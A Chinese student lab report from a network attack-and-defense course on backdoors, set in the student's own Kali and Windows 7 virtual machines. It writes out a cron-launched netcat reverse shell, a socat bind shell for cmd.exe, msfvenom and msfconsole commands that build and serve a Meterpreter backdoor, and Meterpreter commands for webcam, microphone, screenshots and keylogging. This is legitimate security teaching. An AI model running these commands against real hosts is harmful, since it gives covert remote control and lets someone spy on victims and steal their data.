- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

- 实验任务

(1)使用netcat获取主机操作Shell,cron启动 (0.5分)

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

- 基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

通过点击一些不安全的链接或是进入钓鱼网站,在这个过程中就容易下载恶意程序,使得后门被植入。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

Windows中,运行绑定有后门的程序时,后门就会启动;

Linux中,可以通过crontab功能定时触发,或通过给软件绑定注入shellcode,从而启动后门。

- (3)Meterpreter有哪些给你映像深刻的功能?

有可以打开摄像头进行录制、捕捉屏幕、得到远程控制权、捕获按键信息、控制被控主机的shell,执行指令等功能。

- (4)如何发现自己有系统有没有被安装后门?

查看开机自启动项中有无可以的;

查看杀毒软件中有没有危险软件;

查看本机有没有异常开放的端口。

- 实验准备

- Windows获得Linux Shell

  • 在Windows7环境中,使用ipconfig查看本机IP;

  • 使用ncat.exe程序监听本机的5206端口:

  • 在Kali中,使用nc指令的-e选项反向连接Windows主机的5206端口:

  • 成功获得Kali的shell。

- Linux获得Windows Shell

  • 在Kali中,使用ifconfig查看IP;

  • 使用nc指令监听5206端口;

  • 在Windows7环境中,使用ncat.exe程序的-e选项项反向连接Kali主机的5206端口;

  • 成功获得Windows的Shell。

- 实验过程

- 使用netcat获取主机操作Shell,cron启动

  • 在Windows7环境中,监听5206端口;

  • 在Kali中,用crontab -e指令编辑一条定时任务

  • 在编译器的最后一行添加39 * * * * /bin/netcat 172.30.4.74 5206 -e /bin/sh,使每个小时的第39分钟反向连接Windows主机的5206端口:

  • 当到达39时,获得Kali的shell

- 使用socat获取主机操作Shell, 任务计划启动

  • socat:socat是ncat的增强版,它使用的格式是
socat [options] <address> <address>
```,其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。 - 在“任务计划程序”中“创建任务”,填写任务名称,新建一个触发器,并在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5206 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5206,同时把cmd.exe的stderr重定向到stdout上;
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164125817-68635726.png) - 在Kali中,输入指令socat - tcp:172.30.4.74:5206,成功获得主机操作Shell。
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164138133-1912546386.png) ### - 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell - 输入生成后门程序的指令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.128 LPORT=5206 -f exe > 20165206_backdoor.exe

![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164156618-1282056174.png)

- 在Windows环境中,输入指令ncat.exe -lv 5206 > 20165206_backdoor.exe,这样被控主机就进入了接收文件模式;
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164209282-414501312.png) - 在Kali中,执行nc 172.30.4.74 5206 < 20165206_backdoor.exe,传送接收文件; - 在Kali中,再打开一个终端,使用msfconsole指令进入msf控制台;
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164230018-1054523741.png) - 进行配置,使用监听模块,设置payload,设置反弹回连的IP和端口。输入指令如下: use exploit/multi/handler(使用监听模块,设置payload) set payload windows/meterpreter/reverse_tcp
(使用和生成后门程序时相同的payload) set LHOST 192.168.153.128 set LPORT 5206
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164253683-400612770.png) - 输入exploit进行监听;
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164309925-312552632.png) - 在Windows7中运行后门程序,输入指令20165206_backdoor.exe;
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164348903-600348893.png) - Kali获得Windows主机的连接,并且得到了远程控制的shell;
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164333853-1257493212.png) ### - 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 - 使用screenshot指令可以进行截屏
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164427688-661672967.png) ![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164437658-987595055.png) - 使用webcam_snap指令可以使用摄像头进行拍照; ![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164515844-934700343.png) - 使用record_mic指令可以截获一段音频; ![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164535504-106230298.png) - 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
![](https://img2018.cnblogs.com/blog/1296608/201903/1296608-20190321164558892-1487006269.png) ## - 实验体会 这次实验很新奇,趣味性很强,接触到了不少以前没接触过的东西。通过这次实验让我初步尝试了一些我所想象的黑客可以进行的操作,比如侵入对方主机获取shell、打开摄像头录制等等,虽然只是一些基本操作,但我也很有成就感,收获很大。实验过程遇到了一些困难,但通过学习老师教程以及参考学长学姐的博客,也基本完成了实验。在今后的学习中,我将会进一步深入研究这方面的知识。

2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  5. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  6. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  7. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  8. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

  9. 2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

随机推荐

  1. 常见的概率分布类型(Probability Distribution)

    统计学中最常见的几种概率分布分别是正态分布(normal distribution),t分布(t distribution),F分布(F distribution)和卡方分布(χ2 distribut ...

  2. 一文入门HTML5

    1.HTML5 上节回顾:一文读懂ES6(附PY3对比) | 一文入门NodeJS 演示demo:https://github.com/lotapp/BaseCode/tree/master/java ...

  3. bzoj1997 Planar

    题目链接 思路 首先以那个环为框架,把所有的边连出来.如果有两条边相交,那么就把其中一条放到环外面去. 如图: \((1,3)\)与\((2,5)相交,\)(1,4)\(与\)(2,5)相交.所以我们 ...

  4. CF739E Gosha is hunting DP+wqs二分

    我是从其他博客里看到这题的,上面说做法是wqs二分套wqs二分?但是我好懒呀,只用了一个wqs二分,于是\(O(nlog^2n)\)→\(O(n^2logn)\) 首先我们有一个\(O(n^3)\)的 ...

  5. python的数据类型及运用

    int: 主要方法:a.bit.length()———将a转化为二进制的最小位数: bool: false/True str——>bool: s='空'——>false s=“非空”——& ...

  6. hadoop记录-浅析Hadoop中的DistCp和FastCopy(转载)

    DistCp(Distributed Copy)是用于大规模集群内部或者集群之间的高性能拷贝工具. 它使用Map/Reduce实现文件分发,错误处理和恢复,以及报告生成. 它把文件和目录的列表作为ma ...

  7. LabView ModBus安装

    好久没写东西了(好菜哦...) 最近搞一个项目,开始入门LabVIEW,感觉类似于MATLAB里面的simulink 我使用LabVIEW是想用来和PLC通信的.因为PLC里面可以做ModBus,所以 ...

  8. [Reinforcement Learning] 马尔可夫决策过程

    在介绍马尔可夫决策过程之前,我们先介绍下情节性任务和连续性任务以及马尔可夫性. 情节性任务 vs. 连续任务 情节性任务(Episodic Tasks),所有的任务可以被可以分解成一系列情节,可以看作 ...

  9. logging 简单使用

    import logging logging.basicConfig( level=logging.DEBUG, format='[%(asctime)s <%(filename)s :%(li ...

  10. .net aop 操作 切面应用 Castle.Windsor框架 spring 可根据接口 自动生成一个空的实现接口的类

    通过unget 安装Castle.Windsor using Castle.DynamicProxy; using System; using System.Collections.Generic; ...